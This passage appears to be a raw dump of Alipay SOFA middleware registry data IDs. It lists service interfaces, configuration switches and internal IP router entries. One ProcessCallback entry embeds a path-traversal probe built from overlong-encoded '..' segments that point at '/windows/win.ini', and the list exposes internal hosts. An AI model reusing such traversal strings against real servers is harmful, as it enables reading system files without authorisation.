.RiskmngCsCheckTaskOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:publicDomain_insmktdds@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbill.facade.service.PcreditBillReductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.biz.underwrite.scheduler.task.TaskExecutor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxprod.common.service.facade.api.style.SceneBlockStyleMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.113.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finaicontentcore.api.solution.SolutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.product.BizProductConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imtmsvcprod.common.service.facade.edu.EduOneCardConfigBackyardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:sffgroupqiankundemo#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fincommontaskhub.service.facade.service.spi.DataProcessService:1.0:sccounter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:agdsbatch@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.charityprod.commom.service.facade.AwardBadgeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInMatchAllRequest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.variable.VariableSnapshotQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.FinacGLVchrOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.176.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundprod.common.service.facade.UserActivityPrizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_workOrderApproveAcceptCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.zcache.tbase.finfocoreTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.common.service.facade.adaptor.pgm.PgmChangeCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cap.common.service.CapSessionService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.charityprod.commom.service.facade.CharityNgoFeedbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:tscentermng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dayutrprod.common.facade.capacity.ActivityDacuFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmatchprod.common.service.facade.product.ProductSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:yebAssetFlux@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillFamilyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.ClearingRecoveryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.equity.EquityOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.changerequirement.facade.spi.ChangeIterationSpi:1.0:opscloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Pub_Servers_TP_S_CLEARING_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.18.118.79#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.airbops:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteUrls,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iconnect.common.facade.api.CreativeResourceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.166.130#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.riskservice.spi.OpsChngSyncRiskService:1.0:checkroute_sync@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayPartnerInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_UNITRADEPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.202#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchportalcore.common.service.facade.reachshop.ShopRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.PortalAccountServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileacauth.service.trustlogin.facade.TrustLoginService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_ukeyAudit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.103.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insopenprod.common.service.facade.api.InsSceneMarketTaskFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:workflow_feedback_userFeedbackGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_ITRADE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbcontent.common.service.facade.api.comment.KbCommentManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:microloan_agdsdatahub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.facade.api.ReleaseInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.api.AsyncRareAuditResultService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:ctuofflineplt@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accrmcore.common.service.facade.CRMLabelRelationFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zmyschecker.common.service.facade.airflow.AswfFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.api.ShopRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.voucherPay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilewealth.common.service.facade.api.UniformProdFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.mybank.bkassetmore.common.service.facade.api.QualifiedStandardServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.antschedulerconsole.facade.JobOpenApiFacade:1.0:zmschedulerconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RccenterCompanyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.assetflux.service.assettool.spi.AssetToolCreditService:1.0:debittrans-credit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileaix.common.service.facade.MobileAiSolutionReleaseServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finorm.finriskcenter.common.facade.api.guardian.BizEventDirectServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.alphad.common.service.facade.tntinst.api.IMemberQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.question.facade.QuestionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pcinstmis_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.claimoperation.common.service.ClaimMonitorMeasureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkdepbuss.common.facade.SaAccountBindingOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mychain.dl.facade.PfFinApplyQueryFacade:1.0:dev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:aeicoreAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsLdcManager.tairCacheV2Enable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.0.166.159#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:rccenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassistantcore.mng.facade.tenant.api.MngTenantUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.investtrade.facade.api.security.SecurityDealOptionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0.0:liquadationBillWithDrawCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYBUMNGJSESSIONID.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.notCheckOutDoorPicWhiteListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.CouponTemplateControlResource.disableCouponBizRuleManage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minicenter.common.service.facade.api.audit.MiniAppSkipAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.variable.facade.VariablePriorityStoreService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custprod.service.api.AccountCancelOperateFacade:1.0:bkloantrade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.aliedit.AlieditDecryptService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumequery.common.service.facade.UsedBankCardQueryRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepolaris.common.service.facade.mobilegeocoding.MobilegeocodingTestToolService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmpservice.common.service.facade.dmp.DmpQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.common.api.InsUserCenterGrayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zprod.common.service.psyche.LocationService:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.service.facade.api.fund.FundsRiskActionFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.backend.RecruitModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fpdecisionplatform_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincoretechdss.service.facade.api.FincoreTecdssSummaryAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.back.DrmFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.SimpleService-28#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.mychain.baas.common.user.service.ChainCertFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.openinsight.common.service.facade.search.api.SearchAbilityInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openauth.common.service.facade.authtoken.AuthTokenManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sitebuilder@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rpc.service.TranslateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gmcore.common.service.facade.api.TradeShopInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.promotion.common.service.facade.api.activitymanage.CashbackBudgetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotetradeprod.common.service.facade.api.QuoteQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdecision.common.service.facade.api.ClearingPredictConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cashiercore.service.facade.spi.CashierCoreBizCallbackService:1.0:pcreditprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkinstportal.common.service.facade.proxy.api.BkinstportalProdProxyFacade:1.0:bkinstportalProdProxyFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lowercaseFirst:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.97.0#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pricemng.common.service.facade.api.price.PriceCorrectionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.onlinequality.common.service.facade.fundcheck.FcRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaLogParamSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.common.service.integration.mockcenter.MockcenterClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.MerchantItemQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.notSupportIdempotentCustoms,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.180.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.ryb.drm.RYBParamDrmManager.rybInventoryTightRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.gotone.common.service.api.MessageSendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.secuprod.biz.service.gw.community.api.user.SecuUserManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.risk.RiskDefenseAsyncCheckQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_ANTFOREST_TRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.prodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireMaxConnectionMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbservcenter.core.service.repository.TodoTaskItemRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.starstage.facade.StarstageFormRecordFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:apsettlement@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.225.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fraudmng:name=com.alipay.rule.core.publish.drm.RulePublishResource.threadConfigurations,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.speech.api.topic.SecuAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmembercore.common.facade.prepaid.PrepaidTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alifi.shared.component.lock.service.LockBSFacade:1.0:bkcloudfunds-lockBSFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.ProductLimitedDRM.supportFastSourceType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.12.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_C_IBC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_M_SHOP_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbsettle.service.facade.common.api.alsc.AlscSettleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.service.facade.ShakeCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.158.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.abilitycore.common.service.facade.mng.UnifiedAbilityMsgPushFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.afwrobottwa:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.accountOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.134.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.NodeQueryApi:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.config-security-false:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreRzoneTair_dest.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYANTBUSERVICESESSIONID.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkmerchantprod.common.service.facade.trade.TradeMerchQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mwalletmng.common.service.facade.cif.CouponPwdSwitchServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.149.160#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:tsm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.179.197#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.channelspop.service.solution.sst.facade.SstIsvManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sre.cloudpaychecker.facade.account.BillRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_YEB#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.processmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.MerchantOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.ukey.facade.UkeyServiceTimeInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.done.common.service.facade.DoneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.service.PcreditMarketTaskManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.management.DstMixInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csmobile.servie.facade.api.RobotPageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.client.drm.DataSwapAllClientDrmResource.rpcRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcinstoperation@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.search.api.ServiceSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmonitor.core.service.facade.GatewayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.activity.service.DailyCashQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.salesmng.common.service.facade.merchant.api.MerchantAuditService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:openauth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.common.service.facade.SportPunchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.xts.bacs.spi.BusinessActivityStateResolver:1.0:bizreconResolver@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:helper@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.pcardsales.biz.event.resource.PcardThreadPoolDrmResource.corePoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebillcenter.common.service.facade.EbillBigDataCallBackFacade:1.0:pucprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:gypsophila@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:instservicecore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.facade.common.guardian.api.GuardianFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.rate.triple.RateStatisticTriple:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/windows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.gateway.facade.AntCloudRpcApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","antmetadata@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:authcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_ECSIGN#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.158.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zcbmarketcenter:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.buc.acl.api.service.PermissionReadService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.common.service.facade.censor.CensorFaultQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mquery.common.service.facade.auto.MdataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.kernel.common.service.facade.CommonFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lowercaseFirst:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.debug,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:auth-fail@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.component.tairdb.TairRepositoryGZone:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","channelspop@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acccenter.common.service.facade.inner.ProductFeaturesFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.inscharityprod.common.service.facade.InsureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:cn.com.antcloud.aciamcore.common.service.facade.login.LoginInfoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Sub_Servers_TP_S_INSURE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.clearingcenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInMatchAllRequest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.baitiaoprod.common.service.facade.mng.TaskServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_BAOXIANGW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.bizinsight.common.service.facade.crowd.CrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.tradeexprod:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.sampleRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.trafficcardsp.common.service.facade.PartnerDataDictionaryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.core.service.censor.ruleinfo.CensorRuleInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.facade.open.spi.FinnetSpiReceiveService:1.0:instdatalink@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchantsettle.common.service.facade.api.SettleRegisterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.MrchisRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csaccurate.service.facade.api.AccurateDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:fengdie#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.paymentmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.serializeBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","pcmerchantprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID